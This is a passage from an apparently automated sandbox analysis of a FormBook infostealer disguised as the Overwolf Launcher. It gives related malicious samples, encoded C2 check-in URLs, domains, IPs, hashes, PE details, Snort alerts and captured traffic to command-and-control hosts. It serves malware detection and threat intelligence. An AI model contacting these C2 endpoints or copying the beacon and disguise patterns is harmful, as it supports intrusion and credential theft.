                                            • www.secondstock.net/bl/?5jUTGX5=Wi4upJH3j8dcXoO9AQ1eNX6biDE6+9Bs2PWdskJd2fRZuZo7IrUrEcTRl53i32dzaaWOUYxhz4/IDbTEgd4pZA==&t2Kde=3f0P0L&sql=1
                                            42RFQ Requirements for IPREN BV Belgium.exeGet hashmaliciousBrowse
                                            • www.intentionalswellness.com/i8/?tB=fQIT6lb5bKveVEZp184pYSohrmEvJJtpGMm5Y4F36KmhukGLuOCTdKm9RsiKO/JIgCauR/yWI3vntq87R8DpMQ==&8pBXn=3f3DUfw
                                            45payment Swift pdf.exeGet hashmaliciousBrowse
                                            • www.kubisakgallery.com/ca/?id=BZxWaSmYUPrv6stoRoxNHI2IZsx63eCqm5Sjq_EPIYiEr9MsTJliHkoQBda0MXJZQARXprJSY2kheoryDAvd1w..
                                            16information.exeGet hashmaliciousBrowse
                                            • www.ecoverhome.com/xx/?z0=QXty3DNHB4YPk1gpHAm1V/xm0bmYeX4i1lL7nNejCRZ1TEgt1Qj4HODagFM0RyuZ+ouF9spRcBugsTYJUbOMjQ==&9ruT=6l9L_

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            www.fallgus.comXWW8KE7078.exeGet hashmaliciousBrowse
                                            • 103.224.182.242
                                            ext-sq.squarespace.comJAAkR51fQY.exeGet hashmaliciousBrowse
                                            • 198.185.159.144
                                            13-01-21.xlsxGet hashmaliciousBrowse
                                            • 198.185.159.145
                                            FtLroeD5Kmr6rNC.exeGet hashmaliciousBrowse
                                            • 198.185.159.145
                                            xrxSVsbRli.exeGet hashmaliciousBrowse
                                            • 198.185.159.144
                                            QN08qH1zYv.exeGet hashmaliciousBrowse
                                            • 198.185.159.144
                                            FTH2004-005.exeGet hashmaliciousBrowse
                                            • 198.49.23.145
                                            order.exeGet hashmaliciousBrowse
                                            • 198.49.23.145
                                            inv.exeGet hashmaliciousBrowse
                                            • 198.185.159.145
                                            Order (2021.01.06).exeGet hashmaliciousBrowse
                                            • 198.185.159.144
                                            SHIPPING INVOICEpdf.exeGet hashmaliciousBrowse
                                            • 198.185.159.144
                                            Nuevo pedido.exeGet hashmaliciousBrowse
                                            • 198.185.159.144
                                            payment copy.exeGet hashmaliciousBrowse
                                            • 198.185.159.144
                                            https://www.cloudfilesend.com/x/jvNrWPGTjrB1Get hashmaliciousBrowse
                                            • 198.185.159.145
                                            List.exeGet hashmaliciousBrowse
                                            • 198.185.159.144
                                            AWBInvoice INA10197.exeGet hashmaliciousBrowse
                                            • 198.185.159.144
                                            mfcnvy4bb.exeGet hashmaliciousBrowse
                                            • 198.185.159.144
                                            Purchase Order 75MF3B84_Pdf.exeGet hashmaliciousBrowse
                                            • 198.185.159.145
                                            PURCHASE ORDER_PDF.exeGet hashmaliciousBrowse
                                            • 198.49.23.144
                                            (G0170-PF3F-20-0260)2T.exeGet hashmaliciousBrowse
                                            • 198.185.159.145
                                            LETTER OF AUTHORITY 18DEC.xlsxGet hashmaliciousBrowse
                                            • 198.185.159.144

                                            ASN

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            SQUARESPACEUSJAAkR51fQY.exeGet hashmaliciousBrowse
                                            • 198.185.159.144
                                            13-01-21.xlsxGet hashmaliciousBrowse
                                            • 198.185.159.145
                                            FtLroeD5Kmr6rNC.exeGet hashmaliciousBrowse
                                            • 198.185.159.145
                                            xrxSVsbRli.exeGet hashmaliciousBrowse
                                            • 198.185.159.144
                                            pHUWiFd56t.exeGet hashmaliciousBrowse
                                            • 198.49.23.145
                                            T0pH7Bimeq.exeGet hashmaliciousBrowse
                                            • 198.185.159.144
                                            QN08qH1zYv.exeGet hashmaliciousBrowse
                                            • 198.185.159.144
                                            FTH2004-005.exeGet hashmaliciousBrowse
                                            • 198.49.23.145
                                            order.exeGet hashmaliciousBrowse
                                            • 198.49.23.145
                                            inv.exeGet hashmaliciousBrowse
                                            • 198.185.159.145
                                            SHIPPING INVOICEpdf.exeGet hashmaliciousBrowse
                                            • 198.185.159.144
                                            Nuevo pedido.exeGet hashmaliciousBrowse
                                            • 198.185.159.144
                                            payment copy.exeGet hashmaliciousBrowse
                                            • 198.185.159.144
                                            https://www.cloudfilesend.com/x/jvNrWPGTjrB1Get hashmaliciousBrowse
                                            • 198.185.159.145
                                            List.exeGet hashmaliciousBrowse
                                            • 198.185.159.144
                                            AWBInvoice INA10197.exeGet hashmaliciousBrowse
                                            • 198.185.159.144
                                            990109.exeGet hashmaliciousBrowse
                                            • 198.185.159.144
                                            mfcnvy4bb.exeGet hashmaliciousBrowse
                                            • 198.185.159.144
                                            Purchase Order 75MF3B84_Pdf.exeGet hashmaliciousBrowse
                                            • 198.185.159.145
                                            PURCHASE ORDER_PDF.exeGet hashmaliciousBrowse
                                            • 198.49.23.144
                                            BODIS-NJUS65BV6gbGFl.exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            PO85937758859777.xlsxGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            PO#218740.exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            g2fUeYQ7Rh.exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            c6Rg7xug26.exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            sample20210111-01.xlsmGet hashmaliciousBrowse
                                            • 199.59.242.150
                                            IRS Notice Letter pdf document.exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            mQFXD5FxGT.exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            099898892.exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            ZIPEXT#U007e1.EXEGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            990109.exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            SAWR000148651.exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            SHIPPING INVOICEpdf.exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            https://www.chronopost.fr/fclV2/authentification.html?numLt=XP091625009FR&profil=DEST&cc=47591&type=MASMail&lang=fr_FRGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            IRS Notice Letter.exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            IRS Notice Letter.exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            Payment Order Inv.exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            h3dFAROdF3.exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            kqwqyoFz1C.exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            file.exeGet hashmaliciousBrowse
                                            • 199.59.242.153
                                            TRELLIAN-AS-APTrellianPtyLimitedAUXWW8KE7078.exeGet hashmaliciousBrowse
                                            • 103.224.182.242
                                            rtgs_pdf.exeGet hashmaliciousBrowse
                                            • 103.224.182.243
                                            rib.exeGet hashmaliciousBrowse
                                            • 103.224.212.222
                                            http://walmartprepaid.comGet hashmaliciousBrowse
                                            • 103.224.182.245
                                            P.O-45.exeGet hashmaliciousBrowse
                                            • 103.224.182.243
                                            order FTH2004-005.exeGet hashmaliciousBrowse
                                            • 103.224.182.243
                                            https://www.chronopost.fr/fclV2/authentification.html?numLt=XP091625009FR&profil=DEST&cc=47591&type=MASMail&lang=fr_FRGet hashmaliciousBrowse
                                            • 103.224.182.251
                                            http://theupsstoree.comGet hashmaliciousBrowse
                                            • 103.224.182.246
                                            Purchase Order 40,7045.exeGet hashmaliciousBrowse
                                            • 103.224.182.242
                                            emotet.docGet hashmaliciousBrowse
                                            • 103.224.212.219
                                            emotet.docGet hashmaliciousBrowse
                                            • 103.224.212.219
                                            L0CzpAvZC0.docmGet hashmaliciousBrowse
                                            • 103.224.212.219
                                            Breve-Tufvassons sp.o.o.o Company Profile And Bout Us.exeGet hashmaliciousBrowse
                                            • 103.224.212.220
                                            http://info.accumail.com/fcadincl?shape=exitpopup&site=HM&area=DIR.INFOTECH.SERVICES.CONSULT&border=0&keyword=embeddedexitpopupGet hashmaliciousBrowse
                                            • 103.224.182.234
                                            Purchase Order 40,7045$.exeGet hashmaliciousBrowse
                                            • 103.224.182.242
                                            http://www.ericbess.com/ericblog/2008/03/03/wp-codebox/#examplesGet hashmaliciousBrowse
                                            • 103.224.182.24
                                            n4uladudJS.exeGet hashmaliciousBrowse
                                            • 103.224.182.242
                                            http://naekdwines.comGet hashmaliciousBrowse
                                            • 103.224.182.244
                                            tbzcpAZnBK.exeGet hashmaliciousBrowse
                                            • 103.224.182.244
                                            http://ww1.0ffice.com/Get hashmaliciousBrowse
                                            • 103.224.182.24
                                            DXTL-HKDXTLTseungKwanOServiceHKPurchase Order -263.exeGet hashmaliciousBrowse
                                            • 156.235.238.89
                                            DTwcHU5qyI.exeGet hashmaliciousBrowse
                                            • 156.237.170.187
                                            HSBC payment swift copy.exeGet hashmaliciousBrowse
                                            • 154.81.117.10
                                            RFQ1101.exeGet hashmaliciousBrowse
                                            • 154.214.78.145
                                            FTH2004-005.exeGet hashmaliciousBrowse
                                            • 154.215.134.40
                                            2143453.exeGet hashmaliciousBrowse
                                            • 175.29.154.57
                                            SKM_C258201001130020005057.exeGet hashmaliciousBrowse
                                            • 156.235.238.116
                                            order no. 3643.exeGet hashmaliciousBrowse
                                            • 156.235.140.233
                                            PURCHASE ORDER_no. 64392094_pdf.exeGet hashmaliciousBrowse
                                            • 154.218.96.60
                                            Purchase order pdf.exeGet hashmaliciousBrowse
                                            • 154.83.74.205
                                            IMG30122020.exeGet hashmaliciousBrowse
                                            • 156.235.209.86
                                            P.O-45.exeGet hashmaliciousBrowse
                                            • 154.221.136.226
                                            Rfq_Catalog.exeGet hashmaliciousBrowse
                                            • 154.214.158.28
                                            LOI.exeGet hashmaliciousBrowse
                                            • 154.81.101.217
                                            Details bookings.exeGet hashmaliciousBrowse
                                            • 154.93.165.239
                                            BpVCi7qacD.exeGet hashmaliciousBrowse
                                            • 45.199.113.43
                                            IRS Notice Letter.exeGet hashmaliciousBrowse
                                            • 154.80.170.244
                                            SHANDONG.exeGet hashmaliciousBrowse
                                            • 156.235.140.233
                                            Order No. BCM190282.exeGet hashmaliciousBrowse
                                            • 156.225.127.210
                                            Jm563g9RCA.exeGet hashmaliciousBrowse
                                            • 156.238.108.200

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\zHgm9k7WYU.exe.log
                                            Process:C:\Users\user\Desktop\zHgm9k7WYU.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1216
                                            Entropy (8bit):5.355304211458859
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                            MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                            SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                            SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                            SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                            Malicious:true
                                            Reputation:high, very likely benign file
                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.442283502104533
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            File name:zHgm9k7WYU.exe
                                            File size:1081344
                                            MD5:d97a26894ec19dc562eec833ccb5607f
                                            SHA1:5aa0632c496d7e1441eef50c61c6a97c5adee565
                                            SHA256:2fdfbfc735f43a4e2dce0c849b41ab83dd17228f6df983f7a95d6e427cdc77b0
                                            SHA512:103979db357ec67e7637f95aa3047a1eb704fb6f9531f9f1f9f4046ab60aaa0e68d73bc78c144b70c2ce18f3d9d01582621e85750e84e457ea64bfea104efb27
                                            SSDEEP:24576:vjF1wmDGR9u8p+yIZkFydFNOou/7vs7I:x1jSR9uyZIZki+ou/7v
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...h.._..............0..t............... ........@.. ....................................@................................

                                            File Icon

                                            Icon Hash:00828e8e8686b000

                                            Static PE Info

                                            General

                                            Entrypoint:0x50930e
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                            Time Stamp:0x5FFEBC68 [Wed Jan 13 09:24:56 2021 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:v4.0.30319
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                            Entrypoint Preview

                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x1092b40x57.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x10a0000x618.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x10c0000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000x1073140x107400False0.758048062085data7.44897781491IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                            .rsrc0x10a0000x6180x800False0.3330078125data3.48498894423IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x10c0000xc0x200False0.044921875data0.0980041756627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountry
                                            RT_VERSION0x10a0a00x388data
                                            RT_MANIFEST0x10a4280x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                            Imports

                                            DLLImport
                                            mscoree.dll_CorExeMain

                                            Version Infos

                                            DescriptionData
                                            Translation0x0000 0x04b0
                                            LegalCopyrightCopyright Overwolf 2011 - 2020
                                            Assembly Version2.159.0.0
                                            InternalNameXe.exe
                                            FileVersion2.159.0.0
                                            CompanyNameOverwolf Ltd.
                                            LegalTrademarks
                                            CommentsOverwolf Launcher
                                            ProductNameOverwolfLauncher
                                            ProductVersion2.159.0.0
                                            FileDescriptionOverwolfLauncher
                                            OriginalFilenameXe.exe

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            01/13/21-20:59:31.222796TCP1201ATTACK-RESPONSES 403 Forbidden804970234.102.136.180192.168.2.5
                                            01/13/21-20:59:53.799149ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.58.8.8.8
                                            01/13/21-21:00:11.721624TCP2031453ET TROJAN FormBook CnC Checkin (GET)4970480192.168.2.5198.49.23.144
                                            01/13/21-21:00:11.721624TCP2031449ET TROJAN FormBook CnC Checkin (GET)4970480192.168.2.5198.49.23.144
                                            01/13/21-21:00:11.721624TCP2031412ET TROJAN FormBook CnC Checkin (GET)4970480192.168.2.5198.49.23.144

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 13, 2021 20:59:31.043766975 CET4970280192.168.2.534.102.136.180
                                            Jan 13, 2021 20:59:31.083604097 CET804970234.102.136.180192.168.2.5
                                            Jan 13, 2021 20:59:31.083880901 CET4970280192.168.2.534.102.136.180
                                            Jan 13, 2021 20:59:31.084306955 CET4970280192.168.2.534.102.136.180
                                            Jan 13, 2021 20:59:31.124156952 CET804970234.102.136.180192.168.2.5
                                            Jan 13, 2021 20:59:31.222795963 CET804970234.102.136.180192.168.2.5
                                            Jan 13, 2021 20:59:31.222832918 CET804970234.102.136.180192.168.2.5
                                            Jan 13, 2021 20:59:31.223040104 CET4970280192.168.2.534.102.136.180
                                            Jan 13, 2021 20:59:31.223118067 CET4970280192.168.2.534.102.136.180
                                            Jan 13, 2021 20:59:31.263206959 CET804970234.102.136.180192.168.2.5
                                            Jan 13, 2021 20:59:52.799052000 CET4970380192.168.2.5154.86.142.251
                                            Jan 13, 2021 20:59:53.072120905 CET8049703154.86.142.251192.168.2.5
                                            Jan 13, 2021 20:59:53.072525024 CET4970380192.168.2.5154.86.142.251
                                            Jan 13, 2021 20:59:53.073518991 CET4970380192.168.2.5154.86.142.251
                                            Jan 13, 2021 20:59:53.346900940 CET8049703154.86.142.251192.168.2.5
                                            Jan 13, 2021 20:59:53.346934080 CET8049703154.86.142.251192.168.2.5
                                            Jan 13, 2021 20:59:53.347393036 CET4970380192.168.2.5154.86.142.251
                                            Jan 13, 2021 20:59:53.347415924 CET4970380192.168.2.5154.86.142.251
                                            Jan 13, 2021 20:59:53.620876074 CET8049703154.86.142.251192.168.2.5
                                            Jan 13, 2021 21:00:11.563503027 CET4970480192.168.2.5198.49.23.144
                                            Jan 13, 2021 21:00:11.721371889 CET8049704198.49.23.144192.168.2.5
                                            Jan 13, 2021 21:00:11.721486092 CET4970480192.168.2.5198.49.23.144
                                            Jan 13, 2021 21:00:11.721623898 CET4970480192.168.2.5198.49.23.144
                                            Jan 13, 2021 21:00:11.879683971 CET8049704198.49.23.144192.168.2.5
                                            Jan 13, 2021 21:00:11.881947041 CET8049704198.49.23.144192.168.2.5
                                            Jan 13, 2021 21:00:11.881994009 CET8049704198.49.23.144192.168.2.5
                                            Jan 13, 2021 21:00:11.882034063 CET8049704198.49.23.144192.168.2.5
                                            Jan 13, 2021 21:00:11.882064104 CET8049704198.49.23.144192.168.2.5
                                            Jan 13, 2021 21:00:11.882067919 CET4970480192.168.2.5198.49.23.144
                                            Jan 13, 2021 21:00:11.882102013 CET8049704198.49.23.144192.168.2.5
                                            Jan 13, 2021 21:00:11.882139921 CET8049704198.49.23.144192.168.2.5
                                            Jan 13, 2021 21:00:11.882175922 CET8049704198.49.23.144192.168.2.5
                                            Jan 13, 2021 21:00:11.882179022 CET4970480192.168.2.5198.49.23.144
                                            Jan 13, 2021 21:00:11.882213116 CET4970480192.168.2.5198.49.23.144
                                            Jan 13, 2021 21:00:11.882225990 CET8049704198.49.23.144192.168.2.5
                                            Jan 13, 2021 21:00:11.882258892 CET4970480192.168.2.5198.49.23.144
                                            Jan 13, 2021 21:00:11.882268906 CET8049704198.49.23.144192.168.2.5
                                            Jan 13, 2021 21:00:11.882294893 CET4970480192.168.2.5198.49.23.144
                                            Jan 13, 2021 21:00:11.882308960 CET8049704198.49.23.144192.168.2.5
                                            Jan 13, 2021 21:00:11.882313013 CET4970480192.168.2.5198.49.23.144
                                            Jan 13, 2021 21:00:11.882360935 CET4970480192.168.2.5198.49.23.144
                                            Jan 13, 2021 21:00:12.040544033 CET8049704198.49.23.144192.168.2.5
                                            Jan 13, 2021 21:00:12.040590048 CET8049704198.49.23.144192.168.2.5
                                            Jan 13, 2021 21:00:12.040621042 CET8049704198.49.23.144192.168.2.5
                                            Jan 13, 2021 21:00:12.040649891 CET8049704198.49.23.144192.168.2.5
                                            Jan 13, 2021 21:00:12.040697098 CET8049704198.49.23.144192.168.2.5
                                            Jan 13, 2021 21:00:12.040740967 CET8049704198.49.23.144192.168.2.5
                                            Jan 13, 2021 21:00:12.040792942 CET4970480192.168.2.5198.49.23.144
                                            Jan 13, 2021 21:00:12.040824890 CET8049704198.49.23.144192.168.2.5
                                            Jan 13, 2021 21:00:12.040891886 CET4970480192.168.2.5198.49.23.144
                                            Jan 13, 2021 21:00:12.040901899 CET8049704198.49.23.144192.168.2.5
                                            Jan 13, 2021 21:00:12.040944099 CET4970480192.168.2.5198.49.23.144
                                            Jan 13, 2021 21:00:12.041017056 CET4970480192.168.2.5198.49.23.144
                                            Jan 13, 2021 21:00:32.271898985 CET4970580192.168.2.5103.224.182.242
                                            Jan 13, 2021 21:00:32.456805944 CET8049705103.224.182.242192.168.2.5
                                            Jan 13, 2021 21:00:32.457068920 CET4970580192.168.2.5103.224.182.242
                                            Jan 13, 2021 21:00:32.457227945 CET4970580192.168.2.5103.224.182.242
                                            Jan 13, 2021 21:00:32.665769100 CET8049705103.224.182.242192.168.2.5
                                            Jan 13, 2021 21:00:32.665801048 CET8049705103.224.182.242192.168.2.5
                                            Jan 13, 2021 21:00:32.667768955 CET4970580192.168.2.5103.224.182.242
                                            Jan 13, 2021 21:00:32.667907953 CET4970580192.168.2.5103.224.182.242
                                            Jan 13, 2021 21:00:32.852745056 CET8049705103.224.182.242192.168.2.5
                                            Jan 13, 2021 21:00:54.999675989 CET4970680192.168.2.5199.59.242.153
                                            Jan 13, 2021 21:00:55.122517109 CET8049706199.59.242.153192.168.2.5
                                            Jan 13, 2021 21:00:55.122833967 CET4970680192.168.2.5199.59.242.153
                                            Jan 13, 2021 21:00:55.123081923 CET4970680192.168.2.5199.59.242.153
                                            Jan 13, 2021 21:00:55.245796919 CET8049706199.59.242.153192.168.2.5
                                            Jan 13, 2021 21:00:55.246642113 CET8049706199.59.242.153192.168.2.5
                                            Jan 13, 2021 21:00:55.246653080 CET8049706199.59.242.153192.168.2.5
                                            Jan 13, 2021 21:00:55.246665955 CET8049706199.59.242.153192.168.2.5
                                            Jan 13, 2021 21:00:55.246675968 CET8049706199.59.242.153192.168.2.5
                                            Jan 13, 2021 21:00:55.246685028 CET8049706199.59.242.153192.168.2.5
                                            Jan 13, 2021 21:00:55.247000933 CET4970680192.168.2.5199.59.242.153
                                            Jan 13, 2021 21:00:55.247061014 CET4970680192.168.2.5199.59.242.153

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 13, 2021 20:58:10.763384104 CET53618058.8.8.8192.168.2.5
                                            Jan 13, 2021 20:58:33.938059092 CET5479553192.168.2.58.8.8.8
                                            Jan 13, 2021 20:58:33.997634888 CET53547958.8.8.8192.168.2.5
                                            Jan 13, 2021 20:59:00.169837952 CET4955753192.168.2.58.8.8.8
                                            Jan 13, 2021 20:59:00.226425886 CET53495578.8.8.8192.168.2.5
                                            Jan 13, 2021 20:59:30.962486029 CET6173353192.168.2.58.8.8.8
                                            Jan 13, 2021 20:59:31.032233000 CET53617338.8.8.8192.168.2.5
                                            Jan 13, 2021 20:59:51.438663960 CET6544753192.168.2.58.8.8.8
                                            Jan 13, 2021 20:59:52.427047968 CET6544753192.168.2.58.8.8.8
                                            Jan 13, 2021 20:59:52.796684027 CET53654478.8.8.8192.168.2.5
                                            Jan 13, 2021 20:59:53.798858881 CET53654478.8.8.8192.168.2.5
                                            Jan 13, 2021 21:00:11.496304989 CET5244153192.168.2.58.8.8.8
                                            Jan 13, 2021 21:00:11.562460899 CET53524418.8.8.8192.168.2.5
                                            Jan 13, 2021 21:00:32.060273886 CET6217653192.168.2.58.8.8.8
                                            Jan 13, 2021 21:00:32.269376040 CET53621768.8.8.8192.168.2.5
                                            Jan 13, 2021 21:00:54.856384039 CET5959653192.168.2.58.8.8.8
                                            Jan 13, 2021 21:00:54.997180939 CET53595968.8.8.8192.168.2.5

                                            ICMP Packets

                                            TimestampSource IPDest IPChecksumCodeType
                                            Jan 13, 2021 20:59:53.799149036 CET192.168.2.58.8.8.8d004(Port unreachable)Destination Unreachable

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            Jan 13, 2021 20:59:30.962486029 CET192.168.2.58.8.8.80x5a0aStandard query (0)www.ricardoinman.comA (IP address)IN (0x0001)
                                            Jan 13, 2021 20:59:51.438663960 CET192.168.2.58.8.8.80xcb2dStandard query (0)www.www7456.comA (IP address)IN (0x0001)
                                            Jan 13, 2021 20:59:52.427047968 CET192.168.2.58.8.8.80xcb2dStandard query (0)www.www7456.comA (IP address)IN (0x0001)
                                            Jan 13, 2021 21:00:11.496304989 CET192.168.2.58.8.8.80x25e8Standard query (0)www.theatomicshots.comA (IP address)IN (0x0001)
                                            Jan 13, 2021 21:00:32.060273886 CET192.168.2.58.8.8.80x223Standard query (0)www.fallgus.comA (IP address)IN (0x0001)
